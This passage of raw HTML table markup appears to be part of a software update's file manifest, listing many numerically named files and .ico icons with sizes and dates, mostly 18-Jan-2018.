applicable</td><td>168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12133</td><td>Not applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12134</td><td>Not applicable</td><td>208</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12135</td><td>Not applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12140</td><td>Not applicable</td><td>18</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12141</td><td>Not applicable</td><td>70</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12142</td><td>Not applicable</td><td>264</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12143</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12144</td><td>Not applicable</td><td>2</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12150</td><td>Not applicable</td><td>306</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12151</td><td>Not applicable</td><td>606</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12152</td><td>Not applicable</td><td>326</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12153</td><td>Not applicable</td><td>332</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12154</td><td>Not applicable</td><td>84</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12157</td><td>Not applicable</td><td>312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12158</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12159</td><td>Not applicable</td><td>292</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12170</td><td>Not 
applicable</td><td>294</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12172</td><td>Not applicable</td><td>320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12173</td><td>Not applicable</td><td>320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12177</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12178</td><td>Not applicable</td><td>754</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12179</td><td>Not applicable</td><td>278</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12180</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12181</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12189</td><td>Not applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12190</td><td>Not applicable</td><td>172</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12191</td><td>Not applicable</td><td>158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>122</td><td>Not applicable</td><td>10,240</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>122.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1221</td><td>Not applicable</td><td>1,336</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1222</td><td>Not applicable</td><td>26</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12220</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12221</td><td>Not applicable</td><td>354</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12222</td><td>Not 
applicable</td><td>280</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12223</td><td>Not applicable</td><td>234</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12224</td><td>Not applicable</td><td>354</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12225</td><td>Not applicable</td><td>198</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12226</td><td>Not applicable</td><td>274</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12227</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12228</td><td>Not applicable</td><td>224</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12229</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1223</td><td>Not applicable</td><td>1,424</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12230</td><td>Not applicable</td><td>138</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1227</td><td>Not applicable</td><td>1,436</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1229</td><td>Not applicable</td><td>956</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>123</td><td>Not applicable</td><td>7,168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>123.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12300</td><td>Not applicable</td><td>316</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12301</td><td>Not applicable</td><td>548</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12302</td><td>Not applicable</td><td>182</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12303</td><td>Not 
applicable</td><td>82</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20511</td><td>Not 
applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20512</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20513</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20514</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20515</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>206</td><td>Not applicable</td><td>3,584</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>206.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20600</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20601</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20602</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20603</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20604</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20610</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20611</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20612</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20613</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20614</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20615</td><td>Not 
applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20616</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20620</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20621</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20622</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20623</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20624</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20625</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20626</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20627</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20628</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20629</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20630</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20631</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20632</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20633</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20634</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20635</td><td>Not 
applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>207</td><td>Not applicable</td><td>17,408</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>207.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20712</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20713</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20714</td><td>Not applicable</td><td>118</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20715</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20716</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20717</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20718</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20719</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20720</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20721</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20722</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20723</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20724</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20725</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20726</td><td>Not 
applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20727</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20728</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20729</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20730</td><td>Not applicable</td><td>104</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20731</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20732</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>208.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20800</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20801</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20802</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20803</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20804</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20805</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20806</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20807</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20808</td><td>Not applicable</td><td>132</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20810</td><td>Not 
applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>209.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2098</td><td>Not applicable</td><td>462</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2099</td><td>Not applicable</td><td>432</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>21</td><td>Not applicable</td><td>570</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>21.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>210.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2100</td><td>Not applicable</td><td>456</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2103</td><td>Not applicable</td><td>276</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2106</td><td>Not applicable</td><td>264</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2107</td><td>Not applicable</td><td>152</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2108</td><td>Not applicable</td><td>244</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2109</td><td>Not applicable</td><td>200</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>211.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2110</td><td>Not applicable</td><td>628</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2111</td><td>Not applicable</td><td>1,408</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2115</td><td>Not applicable</td><td>1,096</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2116</td><td>Not 
applicable</td><td>416</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2117</td><td>Not applicable</td><td>1,148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2118</td><td>Not applicable</td><td>372</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>212.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2120</td><td>Not applicable</td><td>584</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2121</td><td>Not applicable</td><td>560</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2122</td><td>Not applicable</td><td>496</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>213.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>214.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>215.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2150</td><td>Not applicable</td><td>518</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2151</td><td>Not applicable</td><td>848</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2152</td><td>Not applicable</td><td>1,308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>216.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>217.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>218.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>219.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>22.ico</td><td>Not 
applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>220.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2202</td><td>Not applicable</td><td>656</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>221.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2210</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2212</td><td>Not applicable</td><td>344</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2215</td><td>Not applicable</td><td>332</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>222.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2220</td><td>Not applicable</td><td>1,164</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2221</td><td>Not applicable</td><td>1,256</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2222</td><td>Not applicable</td><td>1,000</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2223</td><td>Not applicable</td><td>500</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2225</td><td>Not applicable</td><td>624</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2227</td><td>Not applicable</td><td>340</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2228</td><td>Not applicable</td><td>436</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2229</td><td>Not applicable</td><td>1,340</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>223.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2230</td><td>Not 
applicable</td><td>1,160</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>224.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2240</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>225.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2251</td><td>Not applicable</td><td>1,236</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2252</td><td>Not applicable</td><td>286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2255</td><td>Not applicable</td><td>900</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2256</td><td>Not applicable</td><td>1,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>226.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2260</td><td>Not applicable</td><td>302</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>227.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2270</td><td>Not applicable</td><td>376</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2272</td><td>Not applicable</td><td>960</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2273</td><td>Not applicable</td><td>312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2277</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2278</td><td>Not applicable</td><td>484</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2279</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>228.ico</td><td>Not 
applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2280</td><td>Not applicable</td><td>174</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>229.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>23</td><td>Not applicable</td><td>2,120</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>23.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>230.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2300</td><td>Not applicable</td><td>652</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2301</td><td>Not applicable</td><td>532</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2302</td><td>Not applicable</td><td>180</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2303</td><td>Not applicable</td><td>528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2304</td><td>Not applicable</td><td>528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2305</td><td>Not applicable</td><td>524</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2306</td><td>Not applicable</td><td>840</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2307</td><td>Not applicable</td><td>298</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2309</td><td>Not applicable</td><td>396</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>231.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2310</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2311</td><td>Not 
applicable</td><td>960</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2312</td><td>Not applicable</td><td>252</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2313</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2314</td><td>Not applicable</td><td>252</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2315</td><td>Not applicable</td><td>464</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2316</td><td>Not applicable</td><td>414</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2317</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2318</td><td>Not applicable</td><td>456</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>232.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2320</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2321</td><td>Not applicable</td><td>364</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2322</td><td>Not applicable</td><td>676</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2324</td><td>Not applicable</td><td>240</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2325</td><td>Not applicable</td><td>166</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2326</td><td>Not applicable</td><td>164</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>233</td><td>Not applicable</td><td>10,974</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>233.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2330</td><td>Not 
applicable</td><td>740</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2331</td><td>Not applicable</td><td>420</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2332</td><td>Not applicable</td><td>344</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2333</td><td>Not applicable</td><td>284</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2334</td><td>Not applicable</td><td>420</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2335</td><td>Not applicable</td><td>488</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2336</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2337</td><td>Not applicable</td><td>372</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>234</td><td>Not applicable</td><td>376</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>234.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2345</td><td>Not applicable</td><td>2,712</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>2346</td><td>Not applicable</td><td>648</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>235.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>236.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2361</td><td>Not applicable</td><td>678</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2363</td><td>Not applicable</td><td>1,032</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>237.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2370</td><td>Not 
applicable</td><td>212</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>238.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2380</td><td>Not applicable</td><td>1,750</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2381</td><td>Not applicable</td><td>1,162</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2382</td><td>Not applicable</td><td>1,454</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2383</td><td>Not applicable</td><td>220</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2384</td><td>Not applicable</td><td>2,428</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2386</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not 